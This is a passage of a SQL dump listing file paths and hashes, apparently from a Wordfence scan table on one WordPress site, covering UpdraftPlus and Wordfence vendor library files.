D36267D2773CF089C3D4C0E8797F5EC3B7791D2C3CB0A47B85F8CA13D5,'',0,'?'),(0x3D1226C66C39746F7B7242F29415E522,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-semaphore/test.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-semaphore/test.php',1,0x00000000000000000000000000000000,0x84CFE0C575EF1455D280BA12B5051F88,0x286CA3CAA5BC8C53EF7C6C3E00EA82F90170B73872E914C18043FE349A702BC9,'',0,'?'),(0x03F5F1CADB368D229B292DC4AA8C161E,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-manager-commands.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-manager-commands.php',1,0x00000000000000000000000000000000,0x30A2B8BCA5A5397CC91D8864B45C172C,0xBFBCA9F2708C073801BA1E502167F287C27B15566D3BABBD5AAA50911CBEAB7D,'',0,'?'),(0x1EA212D2FF55802685C99F7CEDC5BF6B,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-manager.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-manager.php',1,0x00000000000000000000000000000000,0x196399D5AB6BCB717994A06255C24096,0xAE1C7562EE254D55259C41A5A3DCD319F15D3846E412BA3697989F7B3E6824A1,'',0,'?'),(0xA58209335804528605D3745E6C84212B,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-meta.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-meta.php',1,0x00000000000000000000000000000000,0xFF89233DEF0C56BAD747C0ABBA4D4766,0x2763661A0B35E875C9A92B4EE84976B8D3E98D9B2C5FEEE8DA40ACAA6CE01478,'',0,'?'),(0x7EE5CE49AFEF2EAB943E9A453371F4AA,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-options.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-options.php',1,0x00000000000000000000000000000000,0x9D72885DD94370C34D53AB4EA52C6C4B,0x10C4D37AA372B04BE5F225EA11240A55DA8B1B3D33D910688A97350EF4CD5A4D,'',0,'?'),(0x97B6F6D83EE13F9E02F478CBDF09C9CF,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task.php',1,0x00000000000000000000000000000000,0x8CE4A2DF6042930AF843B6AAB0FB0E2D,0x3950C1886F70F9FA22E2CB6FBA94BCF475E9F76FBF53A5E4D6CAA22DA15695F3,'',0,'?'),(0x408A445CF90432F9A5330299837D417B,'wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-tasks-activation.php','/home/eckank5/public_html/wp-content/plugins/updraftplus/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-tasks-activation.php',1,0x00000000000000000000000000000000,0xCA8B874818F2F12E45A06B7E60DA3F3B,0xF464F4814F183B95D84C2E1BF1A5045E733D4709AA8AD83B95BD817B055E8DD2,'',0,'?'),(0x02DECE2A28B3932AAD2BAF576A946370,'wp-content/plugins/wordfence/crypto/vendor/autoload.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,0x00000000000000000000000000000000,0x9CA333D4BF3AE1930456AB09988A5527,0x9303BBF67C3C8FD1D4FE500F2A7467AB338D647F5973CFDF2F9180FB90D0F891,'',0,'?'),(0xD542496D1653C0D43936DF379286F058,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,0x00000000000000000000000000000000,0xECA022554522B445623B100544E56EF0,0x168BA9D4B1EBBB7296679DDCEA0C43584A55CB31F89202D6890F59612CD9F031,'',0,'?'),(0x12430B9E79B2D2F538DD2761BCCA16FD,'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,0x00000000000000000000000000000000,0x717EB16691A69CA5EF8CCDEEEB9322E1,0x70112CD52D1003DA67577FBF878105D48EF5BC1E5782D22E63FD4582A2B2E24D,'',0,'?'),(0x53AD93F90A1801E170DE8D4725181BAD,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,0x00000000000000000000000000000000,0x955D5FE58C231244F6B49000F383B5E2,0x1A209FF8DB92F625A713347E4ED97E47682162D817AD3A77829805C98CBF9927,'',0,'?'),(0x0E6135C2CD8542885FF3AD120B8173CE,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,0x00000000000000000000000000000000,0x19B09A79C57450BA3E5261AD53F4402D,0x75157B34F30EB908B71D7385F1C14A89880EF7CC33F7161048A8D7366F77CB72,'',0,'?'),(0xFF6B1C8C0FF9FECF5050999801313CC3,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,0x00000000000000000000000000000000,0xEA6F750E10CD6CE7DB075F9B3440ABA6,0x366225208D22C4CAB473D14AEB027033B0BFB7E738D3B78353C7993AFAB18391,'',0,'?'),(0x8BF04D4148F6CCF400EA9C5B645FD721,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,0x00000000000000000000000000000000,0x35E12C7D76C4A81633BCF547C0E229A9,0x45BD72344000B8D4A124A6E27AE6FA33F0B8246CB2EA1AD06069E46578C36CCA,'',0,'?'),(0x3859ADF5C5769DBFEB43C95B2C029E89,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,0x00000000000000000000000000000000,0xDD3A00F0D13EB29781EDD8C77D4C5100,0x13C0EFC35F55005D713DD5898AAE66815CBF2FA0094064A1CC0DA82B76DC2A28,'',0,'?'),(0xFAE05A967025276E1A91AA576AB51BE5,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,0x00000000000000000000000000000000,0x98BF206F154033196580135D4022A980,0x06ED9E46CCCF024528DB9B36E144ED14916437411842470ECCA09D9D0F55172A,'',0,'?'),(0x504B88B332B449AAF3ABC10B29A50682,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,0x00000000000000000000000000000000,0x79A6190C9A7735E3ED286EC262A86DAD,0x6D2160DA7E3A9BEE2D120ABC08263340EFE54E8F06DFCD5BFD39EAE6A6640DAE,'',0,'?'),(0x2619504474C53F3575F83110596DB2D8,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,0x00000000000000000000000000000000,0x07ED58797FF37EFF58E9F3DCE9C54382,0xE094B542980CFE90B8883A7AB1C5CA89CC824450DA92A4EC9B6CF81A95852D7C,'',0,'?'),(0xEF7FFAB6D5CB95A7B37226D571C74669,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,0x00000000000000000000000000000000,0xBD217981A50557551C5BAB1075334651,0xD7F2F3C4B7D6CD9E26469C9214E549E906E46659B0479FBC8BAADFE5FE9F1B30,'',0,'?'),(0x5EC1B175EBBA7583AC5791649C4D3D95,'wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,0x00000000000000000000000000000000,0xC67AD6D83D45916F30AFB45B1106F2B1,0x1FB56D3F1AC322CA678FEB3D801F30E04E2284F651878860A67527ECB0EB7E49,'',0,'?'),(0xED4E18DDD427A2210D42C46AB6CB33CF,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,0x00000000000000000000000000000000,0x5C1048C9D62123819AA63E62E1578BE6,0x9626DF78C10E8677D3CEB19068D8C4299AC59340356DDFD22E293906DF181852,'',0,'?'),(0x467CF70F9C0CA7A777DC5A512C4F97FE,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,0x00000000000000000000000000000000,0x36DAE3CF3FD10AE5093AAEC29B7B5125,0x84DF0E975AAA494B2F49B5F877C2A51312914F76799B45F80C42695C24478B26,'',0,'?'),(0x4F348BC7B3571C51990094D252F8EF0F,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,0x00000000000000000000000000000000,0x3EC788ADBB0519A92243E569789CFCB9,0xF0AACB0B78E79CAA2199A29FC47DF2971AB685981ECA0E8257AAAFFA0FCB6411,'',0,'?'),(0xDCCCE42EDC5506DB09FDAF5904E4E43D,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,0x00000000000000000000000000000000,0xBE6884C1B3076089B71BC19C56934166,0x0E3C14895C9E47F2CC3B310E1923BDC06BA9164CB4160E97C3A0C3158328D683,'',0,'?'),(0x3E47C77FAD4FE46A50D56CA88DEE4208,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,0x00000000000000000000000000000000,0xFEDC249B5D5CB3E2A2E7D2C6C71ED20B,0xD89A7822836F8C2A49E70A519BD26AB8B71B838AE75428F3471AAC2E10A21A07,'',0,'?'),(0x312DC014FFF5EEF8D718673937B9E5D7,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,0x00000000000000000000000000000000,0x236647AB0DD682B78B42EEAC9F672030,0x91BC63DE28B18C1CA2BF6B04319E86EDE1FAEE9532825177340BFBCA1B053F30,'',0,'?'),(0xDB34908136EF31C26DCECDF90E598F52,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,0x00000000000000000000000000000000,0x34F88F74E1D7515344760E92BEF498C0,0x7F027421851742FB8A78565CCE4E3CFF0BBB740F70CF2153060245C5D0B38996,'',0,'?'),(0x0D80E7FEE0CB58B0F6C0AD2BC32D5461,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,0x00000000000000000000000000000000,0x20BCD3D3D94F3E41DC2BE43D041A172C,0xEBE555E273ECDDCEC2448E4DC399C60C64CDC08028CF0083B1C481A67ECDCCC7,'',0,'?'),(0x96C2A01D16CF768591C6189A62047529,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,0x00000000000000000000000000000000,0xC43D5998918B9940FCB9D30FB75FA578,0xDEB0CA1A5E33C3C99F7689552E61810D5D0166DF68E202498515992873F5C641,'',0,'?'),(0x9CF1FBC4FA9E508B4AE6741EFBFA317A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,0x00000000000000000000000000000000,0x21BF81EC071645ABB5505DC7A13B9F99,0x3CBFF88B02A600DF0D49423D2284503844C722F703B6E0F41BC04C7EE880495B,'',0,'?'),(0x77C38BF4ED07CA390B2F132C2B31FD82,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,0x00000000000000000000000000000000,0x821267DBB02F2AB18206C8432C6B2390,0x6176050C147875AB8BED9DB66AA6191BAB3D9E49A253B6D1447B91F9DEC19221,'',0,'?'),(0x5956F499031432139995397D4438A31F,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,0x00000000000000000000000000000000,0xA8435A3F8DCE404AB14E5F6A693C941A,0x803CB848C084A222D8F446AF40F7AC8CF52513AEAEDA3160373CD2F009A2CD7D,'',0,'?'),(0xE6CF13E5BCE850BF496344C4CBC6BEE8,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,0x00000000000000000000000000000000,0xF8CC1DAED94A0E987381D306C799F942,0xA5B24552A0F44A1862C61FC8B8492216CAEC74DE5D2C98715014FE317F5C6644,'',0,'?'),(0xAC496F6FA8D486356E75A4D1ADB68848,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,0x00000000000000000000000000000000,0x1E303FBDBD34272BCCB6BC4C29240394,0xCC1359094F52D9B440864DBE8211C9F2DFF6C33D91999E781E904DE94BA91A2E,'',0,'?'),(0xB3690FC89C19CC318AE900A6CEE8C138,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,0x00000000000000000000000000000000,0xD30EB6533B680338EE125ED1DC67D452,0xE319D06DEB66CAACBA818FA0D77F53A25854AAA5C5C338CCE041A50E2DBE6781,'',0,'?'),(0xCD5E1D2691F36052E179928B1899EC4A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,0x00000000000000000000000000000000,0xF0E161A76A4044F954D8AAB62B903977,0xC87F94711EC634712B409D67BFA97380767A2CD87E0246ADE9BAA60D2461EAC9,'',0,'?'),(0x080E2604CFF197BB32A0FD8FA8E48FC5,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,0x00000000000000000000000000000000,0x796C688DCA14779E255265AFE7110586,0xB49B0BE4B80A6A71BD57EDDB09D7765FE62384EF2066BAE0B57E03CDD252913E,'',0,'?'),(0xB02D9D0CA80FECB793F6B739F145785A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,0x00000000000000000000000000000000,0x5877F703BE95546781A8CB417D06CD0A,0xAE6BA1635178FA65F4CBB313603D6E36CF58357982DE64167A35755D57422718,'',0,'?'),(0xCFD71280794B76E701D32EF91A10B111,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,0x00000000000000000000000000000000,0x3EB911845FD03314F5D14E77B00C23F7,0xE0C7A504E3029D6D5A7A2A2C3D3A0ABD13D92DE83399990E7CA3C4F92193E3DF,'',0,'?'),(0x1005AB3F4893A9FFC4EB9768AC443009,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,0x00000000000000000000000000000000,0x286A5BA4917DA34220795679E14B0852,0xB22CC717344158082473CA73C0FFE2A87993A945139E6DEF509EF0B859C0D03C,'',0,'?'),(0xA5CAE42AABA5685E03EDDCDB08AFEFEC,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,0x00000000000000000000000000000000,0x270163C672C4CF99447135274789E17E,0x480F2E84879C230A44EAE9BF753975F071853C6641DFD10965B0D55631B813C5,'',0,'?'),(0x87D276C264E54549BF8F89BF7CE749C7,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/ristretto255.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/ristretto255.php',1,0x00000000000000000000000000000000,0x02D96933FF02157326A98BFF61911A77,0x0FF59E4DDA18384A6786D841B90DA7AC60635935B67E3E2C456125F618F06F67,'',0,'?'),(0x0AFAD93AC2583203DE4C958E0E026E63,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,0x00000000000000000000000000000000,0x53BBD8C99B6DA79A8345F67D5A0F6807,0xA8D61E2D79BAE7A22E0103CD3DFD55BFE536BF0A0536A1B4386826DBE8933923,'',0,'?'),(0x84064BA0B85345CBFFC58D9D4CA733C0,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php',1,0x00000000000000000000000000000000,0x563DA488E298D672AE40D9B87E6B7499,0x7C944A008D525D2DF0329E9498B0337AF9BFCA1454839DFEEB483F8D5588EC82,'',0,'?'),(0xB8DB5A8ACC280293C513A77C9FCD5A07,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,0x00000000000000000000000000000000,0x5155FF707E6F63C38A1E34D24E749BFB,0x94114CCEDE6EB56C3240CE90F63E689A692C754A59B248A6895CE34CF42CB242,'',0,'?'),(0x1D14CEBDCA7F127DD856BA2BB57442B3,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,0x00000000000000000000000000000000,0xAD9EEAA480940E78C3D9A0B72595636C,0x4E9E382CFF631CDDDBEDEB61659EACD319F181CE9F0169013C3570241CB3BFF3,'',0,'?'),(0x2149AD645D0535248CA5C05BE0D67EAC,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,0x00000000000000000000000000000000,0x6F0BFBBF4CD1F6D5206B276B31128AFE,0x128E9C31EAA05CAF5174A92ABC80EE4AEFD1EA8EFD2517850F07D8CB7388F226,'',0,'?'),(0xDDE6882798C41D7C3F980CC23EFBEDA3,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,0x00000000000000000000000000000000,0x83A6F74CD5F261444A843FFB835AFF94,0x88BB8B853D463D843D853CF81DF81B5F25883DA7D94D103FE1AADDDCDEE7752F,'',0,'?'),(0x49D650450114D058749C461E48EF2596,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,0x00000000000000000000000000000000,0xAE9AF300C2F5EC4C76BF5B63DECE293F,0xA443DA026821DD80467F24EC7DB97764B8376228A621E470F7494602152E4C90,'',0,'?'),(0x82573D205C27782288578FCC7DEEEE64,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,0x00000000000000000000000000000000,0xA7B0F7D5A9E84B1BBDAD835EE3A5BEB9,0xCF4D89381D103A9F6E61C68B47185ADD715164C3BD21AEA0BCDA27879B266731,'',0,'?'),(0x5AA3B0D18FF484FBDD92AF05BA5308A5,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,0x00000000000000000000000000000000,0x6CF3BF8C1A5E035A924847B325A94FA3,0x896DA4BB9F63B43BF21D0A0579E390B2C8C5302CC60235FF8BD9467C3D1FC843,'',0,'?'),(0x2C7AD865A9E0FA590C23754A7E5B500D,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,0x00000000000000000000000000000000,0x204F700C527B01FCD2B58CE747DD8DDB,0x1993115992FC3A4286E5C550351B4D9080735F860CBCB19AB92ED986FAD68E90,'',0,'?'),(0xE20F424B8619C0F54197613CE4AD6C32,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,0x00000000000000000000000000000000,0xC958DF93E0BEC592225833EE364451DD,0x218F6C2EBA2E1614ACEA4749EEB40A376F65C8D1BFE8273B490CFF0A0AB3A0EC,'',0,'?'),(0x145C9FA4D01AE98E6509CD299FD55570,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,0x00000000000000000000000000000000,0xC89148E41A7F62923E56EF44F6A25232,0x72D19B4AD491492FE90A1E4F8B597D9C78189A82C586EB9410DEFA87C6105520,'',0,'?'),(0x93BABCD2C16271C02FA4D9DB4601A46B,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,0x00000000000000000000000000000000,0xDFF0AAAD3787F5C2A40DAC46C4DD0C67,0x9E6E7F9256278C56B1FBBBA456EEB27F29467C2AE1919D0C1732884EE08FD77A,'',0,'?'),(0x875E53785F3F03758B1D47CA44A9E4EB,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,0x00000000000000000000000000000000,0x94CF48D964393C43F0CBA4AB9AD1626C,0x4BCF2E426FACB0DFD8E0A3B8830776FC886298258598E0D5537E31F94BE0C317,'',0,'?'),(0x4E3DAE66D01B3E244B8AE4E248BC54CE,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,0x00000000000000000000000000000000,0xC7D3EB17913F8F477BF214F58FB8F167,0xC480D0A03C579F3B2D181AF1808D99BE9728432BBC2C4DFE95CC0255E2E15736,'',0,'?'),(0xB7EF2FEFF6D88A21A4064E3EF1820AFE,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,0x00000000000000000000000000000000,0x0EDA1EA266183C5F3212535E49BFAA5A,0xFDAD69DDAF99FF387B1C918169FCB4D8712164BEA0CCD58DA8E541047AF2F5A9,'',0,'?'),(0x599F425779092BE642914F6DC7FD077A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,0x00000000000000000000000000000000,0x239E903A9AE14EC5279444117883D14E,0xA6015BA7F55F7CD090D87E45A9B6A9ED2BAF027EC545EC80289160ED065FAABE,'',0,'?'),(0x4BCB4C783C43A08E98084894F48F651A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,0x00000000000000000000000000000000,0x2DB745064EE4C482DB9B0C280AFA6E1B,0x9A040B16F7DE10A104D1AC7D5E8D4546D0F91C9BCADE3EF41E92DA8242ECDB1E,'',0,'?'),(0x46312B1A23F72B6405D37B1C8B77CE7B,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,0x00000000000000000000000000000000,0xFE2E4436B7709F699A7260B66677DE3D,0xC432C97FB14B4A0E37143386F178A732DA4D32B0AE26982BB78C954CFC87134C,'',0,'?'),(0xA39A45F653D4632B04DFF12308BA1B29,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,0x00000000000000000000000000000000,0x75D21D4E6D8553E1ED94D443DBD27BE7,0xFCD80CD40E10507E9D7B70D510D47D787BD4381190328D681F58F678C5C1BB88,'',0,'?'),(0x21506C7536A093F0EB10A1BCD202435A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,0x00000000000000000000000000000000,0xE01DF298190588C150C5CFD965968931,0x54A8FFFB2A94DB1E2B86D0F8CA7A5DCA9C3B3EAF7F060AE033CACAE45D3F78D7,'',0,'?'),(0x69617B962DCFDB1AF7D899016FB30892,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,0x00000000000000000000000000000000,0x9E7DA93C1FCCC4DC8E827318BEF29C39,0xFEDD51C7FE27D872998620BC741337A5E23D732A1761603CBE7A1FDA6F13D45F,'',0,'?'),(0x90DCFEBCAC2238598E8E023734B74F3C,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,0x00000000000000000000000000000000,0x6469B24244F54AF21088AF44A535C34F,0x4EAB618715BA96698119151B42CFF18DCD0D08F8C6414F5DB6ACA940E150B5E5,'',0,'?'),(0x1EB4C16A16F0D6B94A82DCFE91F63059,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,0x00000000000000000000000000000000,0x70A7305722462994CF038E1093384FA3,0xA935AC9CF02926DAD9426F4B065DAEAFA4D8BB8EF396726D6025AECA68F64F10,'',0,'?'),(0xA8DB09CC2229A522B5E83049A36FA8C7,'wp-content/plugins/wordfence/cr